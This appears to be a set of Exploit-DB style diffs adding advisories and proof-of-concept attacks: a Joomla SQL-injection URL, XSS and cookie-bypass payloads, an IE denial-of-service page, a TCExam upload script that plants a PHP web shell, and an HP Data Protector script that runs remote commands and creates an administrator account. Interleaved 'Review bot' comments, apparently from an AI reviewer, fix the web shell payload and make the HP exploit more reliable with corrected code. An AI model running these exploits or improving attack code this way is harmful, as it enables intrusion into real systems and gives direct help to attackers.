The 'com_sar_news' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_sar_news&id=80/**/AND/**/1=2/**/UNION/**/SELECT/**/1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/*&sort_by=ordering


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/40509/info
Hexjector is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Hexjector 1.0.7.2 is vulnerable; other versions may be affected.
http://www.example.com/Hexjector/hexjector.php?site=<iframe src="http://localhost/hexjector/" height=0 width=0></iframe>&injsubmit=Submit+Query&custom_parameter=

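--- a/platforms/php/webapps/34073.py
+++ b/platforms/php/webapps/34073.py
@@ -0,0 +1,61 @@
+source: http://www.securityfocus.com/bid/40511/info
+TCExam is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
+An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
+TCExam 10.1.007 is vulnerable; other versions may also be affected.
+import sys, socket
+host = 'localhost'
+tc_exam = 'http://' + host + '/TCExam'
+port = 80
+def upload_shell():
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect((host, port))
+s.settimeout(8)
+content = '------x\r\n'\
+'Content-Disposition: form-data; name="sendfile0"\r\n'\
+'\r\n'\
+'shell.php\r\n'\
+'------x\r\n'\
+'Content-Disposition: form-data; name="userfile0"; filename="shell.php"\r\n'\
+'Content-Type: application/octet-stream\r\n'\
+'\r\n'\
+'<?php echo "<pre>" + system($_GET["CMD"]) + "</pre>"; ?>\r\n'\
+'------x--\r\n'\
+'\r\n'
+header = 'POST ' + tc_exam + '/admin/code/tce_functions_tcecode_editor.php HTTP/1.1\r\n'\
+'Host: ' + host + '\r\n'\
+'Proxy-Connection: keep-alive\r\n'\
+'User-Agent: x\r\n'\
+'Content-Length: ' + str(len(content)) + '\r\n'\
+'Cache-Control: max-age=0\r\n'\
+'Origin: null\r\n'\
+'Content-Type: multipart/form-data; boundary=----x\r\n'\
+'Accept: text/html\r\n'\
+'Accept-Encoding: gzip,deflate,sdch\r\n'\
+'Accept-Language: en-US,en;q=0.8\r\n'\
+'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'\
+'Cookie: LastVisit=1275442604\r\n'\
+'\r\n'
+s.send(header + content)
+http_ok = 'HTTP/1.1 200 OK'
+if http_ok not in s.recv(8192):
+print 'error uploading shell'
+return
+else: print 'shell uploaded'
+s.send('GET ' + tc_exam + '/cache/shell.php HTTP/1.1\r\n'\
+'Host: ' + host + '\r\n\r\n')
+if http_ok not in s.recv(8192): print 'shell not found'
+else: print 'shell located at ' + tc_exam + '/cache/shell.php'
+upload_shell()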
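Review bot: The dropped web shell `'<?php echo "<pre>" + system($_GET["CMD"]) + "</pre>"; ?>\r\n'` uses `+`, which in PHP is numeric addition rather than concatenation; `system()` still echoes the command output on its own, but the `<pre>` wrapper is lost and PHP emits a warning/`0` in its place, so the payload line should read `'<?php echo "<pre>" . system($_GET["CMD"]) . "</pre>"; ?>\r\n'`. `s.send(header + content)` does not guarantee that the whole request is written; `s.sendall(header + content)` (and likewise for the follow-up GET) is the correct call on a blocking socket. The request target is the absolute URL (`POST http://host/TCExam/... HTTP/1.1`) together with a `Proxy-Connection` header, which looks like a capture made through an intercepting proxy; most origin servers accept absolute-form, but a path-only target is the safer choice when talking to the server directly. The second request also reuses the same socket and silently assumes the server kept the connection open after the POST, so a `Connection: close` response would make the "shell not found" branch fire even after a successful upload.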


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/40519/info
TPO Duyuru Scripti is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication.
Attackers can exploit this vulnerability to gain administrative access to the affected application, which may aid in further attacks.
The following example data is available:
javascript:document.cookie = "kullanici=; path=/";

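--- a/platforms/win32/local/34037.txt
+++ b/platforms/win32/local/34037.txt
@@ -0,0 +1,61 @@
+?
+OpenVPN Private Tunnel Core Service Unquoted Service Path Elevation Of Privilege
+Vendor: OpenVPN Technologies, Inc
+Product web page: http://www.openvpn.net
+Affected version: 2.1.28.0 (PrivateTunnel 2.3.8)
+Summary: Private Tunnel is a new approach to true Internet security creating
+a Virtual Private Tunnel (VPT) or Virtual Private Network (VPN) that encrypts,
+privatizes, and protects your Internet traffic.
+Desc: Private Tunnel application suffers from an unquoted search path issue
+impacting the Core Service 'ptservice' service for Windows deployed as part
+of PrivateTunnel bundle. This could potentially allow an authorized but
+non-privileged local user to execute arbitrary code with elevated privileges
+on the system. A successful attempt would require the local user to be able
+to insert their code in the system root path undetected by the OS or other
+security applications where it could potentially be executed during application
+startup or reboot. If successful, the local user's code would execute with the
+elevated privileges of the application.
+Tested on: Microsoft Windows 7 Professional SP1 (EN)
+Microsoft Windows XP Professional SP3 (EN)
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+@zeroscience
+Advisory ID: ZSL-2014-5192
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5192.php
+07.07.2014
+---
+C:\Users\user>sc qc ptservice
+[SC] QueryServiceConfig SUCCESS
+SERVICE_NAME: ptservice
+TYPE : 10 WIN32_OWN_PROCESS
+START_TYPE : 2 AUTO_START
+ERROR_CONTROL : 1 NORMAL
+BINARY_PATH_NAME : C:\Program Files (x86)\OpenVPN Technologies\PrivateTunnel\ptservice.exe
+LOAD_ORDER_GROUP :
+TAG : 0
+DISPLAY_NAME : Private Tunnel Core Service
+DEPENDENCIES :
+SERVICE_START_NAME : LocalSystem
+C:\Users\user>icacls "C:\Program Files (x86)\OpenVPN Technologies\PrivateTunnel\ptservice.exe"
+C:\Program Files (x86)\OpenVPN Technologies\PrivateTunnel\ptservice.exe NT AUTHORITY\SYSTEM:(I)(F)
+BUILTIN\Administrators:(I)(F)
+BUILTIN\Users:(I)(RX)
+Successfully processed 1 files; Failed processing 0 files
+C:\Users\user>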
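Review bot: The only ACL evidence shown is `icacls` on `ptservice.exe` itself (`BUILTIN\Users:(I)(RX)`), which proves the binary is not user-writable but says nothing about the paths that an unquoted `BINARY_PATH_NAME` actually exposes — `C:\Program.exe`, `C:\Program Files (x86)\OpenVPN.exe` and `C:\Program Files (x86)\OpenVPN Technologies\PrivateTunnel.exe` — so the advisory demonstrates the misconfiguration, not the elevation. On the stated test systems those directories normally require administrative rights to create files in, which is presumably why the description hedges with "would require the local user to be able to insert their code"; including `icacls C:\` and `icacls "C:\Program Files (x86)\OpenVPN Technologies"` output would substantiate or bound the impact. The remediation is simply to quote the image path, e.g. `sc config ptservice binPath= "\"C:\Program Files (x86)\OpenVPN Technologies\PrivateTunnel\ptservice.exe\""`, and an `ImagePath` value containing a space with no surrounding quotes under `HKLM\SYSTEM\CurrentControlSet\Services\ptservice` is the detection indicator. The stray `?` on the first line looks like a mis-rendered byte-order mark and should be dropped from the file.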


@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/40487/info
Microsoft Internet Explorer is prone to a remote denial-of-service vulnerability.
Attackers can exploit this issue by enticing an unsuspecting user to view a specially crafted webpage.
Successfully exploiting this issue will cause the application to stop responding, denying service to legitimate users.
Internet Explorer 6, 7, and 8 are vulnerable.
<html> <head> <title>Internet Explorer DoS Exploit (C) 2008 MustLive. http://websecurity.com.ua</title> </head> <body> <p style="dos:expression(alert('DoS'))">IE DoS</p> </body> </html>

platforms/windows/remote/34066.py Executable file

@ -0,0 +1,168 @@
#!/usr/bin/python
# Exploit Title: HP-Data-Protector-8.10 Remote command execution.
# Date: July 11 2014
# Exploit Author: Christian (Polunchis) Ramirez https://intrusionlabs.org
# Exploit Author: Henoch (Chanoc) Barrera https://intrusionlabs.org
# Contacts: polunchis@intrusionlabs.org and chanoc@intrusionlabs.org
# Version: HP Data Protector manager 8.10 the last version
# Vendor web page: http://www8.hp.com/mx/es/software-solutions/software.html?compURI=1175640#.U8DhWaU_BjF
# Tested on: Windows 2003, Windows 2008 and Windows 2012 all languages
# Thanks:To GOD for giving us wisdom
# Description:
# A remote command execution is triggered when craft command is sent to the Hp Data Protector Manager to tcp port 5555.
import socket
import struct
import sys
#net user Poc l@bs.og /add
shellusr = ("\x00\x00\x01\x3c\xff\xfe\x32\x00\x00\x00\x20\x00\x68\x00\x70\x00"
"\x64\x00\x70\x00\x31\x00\x00\x00\x20\x00\x30\x00\x00\x00\x20\x00"
"\x00\x00\x20\x00\x00\x00\x20\x00\x45\x00\x4e\x00\x55\x00\x00\x00"
"\x20\x00\x31\x00\x31\x00\x00\x00\x20\x00\x45\x00\x58\x00\x45\x00"
"\x43\x00\x5f\x00\x42\x00\x41\x00\x52\x00\x00\x00\x20\x00\x41\x00"
"\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00"
"\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00"
"\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00"
"\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00"
"\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00"
"\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00"
"\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00"
"\x41\x00\x00\x00\x20\x00\x63\x00\x3a\x00\x5c\x00\x77\x00\x69\x00"
"\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x5c\x00\x73\x00\x79\x00"
"\x73\x00\x74\x00\x65\x00\x6d\x00\x33\x00\x32\x00\x5c\x00\x63\x00"
"\x6d\x00\x64\x00\x2e\x00\x65\x00\x78\x00\x65\x00\x00\x00\x20\x00"
"\x00\x00\x20\x00\x2f\x00\x63\x00\x20\x00\x6e\x00\x65\x00\x74\x00"
"\x20\x00\x75\x00\x73\x00\x65\x00\x72\x00\x20\x00\x50\x00\x6f\x00"
"\x63\x00\x20\x00\x6c\x00\x40\x00\x62\x00\x73\x00\x2e\x00\x6f\x00"
"\x67\x00\x20\x00\x2f\x00\x61\x00\x64\x00\x64\x00\x00\x00\x00\x00")
#net user local group Administrators Poc /add
shellgrp = ("\x00\x00\x01\x56\xff\xfe\x32\x00\x00\x00\x20\x00\x68\x00\x70\x00"
"\x64\x00\x70\x00\x31\x00\x00\x00\x20\x00\x30\x00\x00\x00\x20\x00"
"\x00\x00\x20\x00\x00\x00\x20\x00\x45\x00\x4e\x00\x55\x00\x00\x00"
"\x20\x00\x31\x00\x31\x00\x00\x00\x20\x00\x45\x00\x58\x00\x45\x00"
"\x43\x00\x5f\x00\x42\x00\x41\x00\x52\x00\x00\x00\x20\x00\x41\x00"
"\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00"
"\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00"
"\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00"
"\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00"
"\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00"
"\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00"
"\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00"
"\x41\x00\x00\x00\x20\x00\x63\x00\x3a\x00\x5c\x00\x77\x00\x69\x00"
"\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x5c\x00\x73\x00\x79\x00"
"\x73\x00\x74\x00\x65\x00\x6d\x00\x33\x00\x32\x00\x5c\x00\x63\x00"
"\x6d\x00\x64\x00\x2e\x00\x65\x00\x78\x00\x65\x00\x00\x00\x20\x00"
"\x00\x00\x20\x00\x2f\x00\x63\x00\x20\x00\x6e\x00\x65\x00\x74\x00"
"\x20\x00\x6c\x00\x6f\x00\x63\x00\x61\x00\x6c\x00\x67\x00\x72\x00"
"\x6f\x00\x75\x00\x70\x00\x20\x00\x41\x00\x64\x00\x6d\x00\x69\x00"
"\x6e\x00\x69\x00\x73\x00\x74\x00\x72\x00\x61\x00\x74\x00\x6f\x00"
"\x72\x00\x73\x00\x20\x00\x50\x00\x6f\x00\x63\x00\x20\x00\x2f\x00"
"\x61\x00\x64\x00\x64\x00\x00\x00\x00\x00")
def connect_target(target, port):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
except socket.error as err:
print
"[-]Close Socket! CODE: %d MSG: %s" % (err[0], err[1])
return -1
try:
sock.connect((target, port))
except socket.error as err:
print
"[-] It cannot connect to the target! CODE: %d MSG: %s" % (err[0], err[1])
return -1
return sock
def send_recv_packet(sock, packet):
sock.sendall(packet)
res = sock.recv(4096)
return res
print """
[*] https://intrusionlabs.org
"""
print "[*] Choose a valid option"
print """
[1] Run remote commands
[2] Add Poc user to Administrators group with password l@bs.og
"""
opcion= raw_input("Choose an option i.e. 1 or 2: ")
if opcion.isdigit():
opcion = int(opcion)
if opcion == 1:
ip_remota= raw_input("IP Address: ")
port= raw_input("Port: ")
command= raw_input("command: ")
if port.isdigit():
port = int(port)
else:
print "Please provide a tcp port"
objetivo = connect_target(ip_remota, port)
if objetivo == -1: exit()
OFFSET = 46
command = command.replace("\\", "\\\\")
command_tmno = chr(OFFSET + len(command))
shell = "\x00\x00\x00" +\
command_tmno +\
"\x32\x00\x01" +\
"\x01\x01\x01" +\
"\x01\x01\x00" +\
"\x01\x00\x01" +\
"\x00\x01\x00" +\
"\x01\x01\x00" +\
"\x2028\x00" +\
"\\\x70\x65\x72" +\
"\x6c\x2e\x65\x78" +\
"\x65\x00 \x2d\x65" +\
"\x73\x79\x73\x74\x65\x6d" +\
"('%s')\x00" % command
print >> sys.stderr, "[+] Sending the payload with the command: '%s'" % command
datos = send_recv_packet(objetivo, shell) # Parse the response back
print >> sys.stderr, "[+] Output:"
while True:
# Get information about response
tmno_respuesta = objetivo.recv(4)
if not tmno_respuesta: break
n = struct.unpack(">I", tmno_respuesta)[0]
respuesta = objetivo.recv(n)
respuesta = respuesta[5:].strip()
respuesta = respuesta.replace("\n", "")
respuesta = respuesta.replace("\x00", "")
if respuesta.upper().find("*RETVAL*") != -1:
break
print respuesta
objetivo.close()
print >> sys.stderr, "print [!] Port close...\r"
elif opcion == 2:
ip_remota= raw_input("IP Address: ")
port= raw_input("\nPort: ")
if port.isdigit():
port = int(port)
else:
print "Please provide a tcp port"
print
"\n [*]Creating P0c user and try to add it to Administrators group"
#Get information about response
print "\n[*]Attempting to create Poc user and try to add it to Administrators group with password l@bs.og"
for packet in [shellusr, shellgrp]:
target = connect_target(ip_remota, port)
if target == -1: exit()
data = send_recv_packet(target, packet)
print "[*]SERVER RESPONSE: " + \
data.split("\xFF\xFE\x31\x00\x35\x00\x00\x00\x20\x00")[1].lstrip("\x07\x00\x01\x00").rstrip("$")
target.close()
else: print "Please provide a valid option i.e. 1 or 2"
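Review bot: The error paths in `connect_target` never print their message: in both `except socket.error` branches (and again before the option-2 banner with `"\n [*]Creating P0c user..."`) the formatted string sits on its own line after a bare `print`, so Python 2 prints an empty line and evaluates the string as a discarded expression; join them, e.g. `print "[-] It cannot connect to the target! CODE: %d MSG: %s" % (err[0], err[1])`. The length prefix of the option-1 packet is built as `"\x00\x00\x00" + chr(OFFSET + len(command))`, which caps the command at 209 bytes and raises `ValueError` beyond that; `struct` is already imported, so `struct.pack(">I", OFFSET + len(command))` yields the full 4-byte big-endian length the response parser already assumes with `struct.unpack(">I", ...)`. The response loop treats `objetivo.recv(4)` and `objetivo.recv(n)` as if they return exactly the requested byte counts, which TCP does not guarantee, so a split read desynchronises the framing; a small read-exactly helper, sketched below, fixes that. A non-numeric port only prints `"Please provide a tcp port"` and then falls through into `connect_target` with a string, so those branches should `sys.exit(1)`. Whether `"\x2028\x00"` — which Python parses as `\x20` followed by the literal characters `28` — is the intended encoding cannot be told from here.
```python
def recv_exact(sock, n):
    """Read exactly n bytes, or whatever arrived before the peer closed."""
    buf = ""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            break
        buf += chunk
    return buf

# ... unchanged: option parsing, packet construction, send ...
tmno_respuesta = recv_exact(objetivo, 4)
if len(tmno_respuesta) < 4: break
n = struct.unpack(">I", tmno_respuesta)[0]
respuesta = recv_exact(objetivo, n)
```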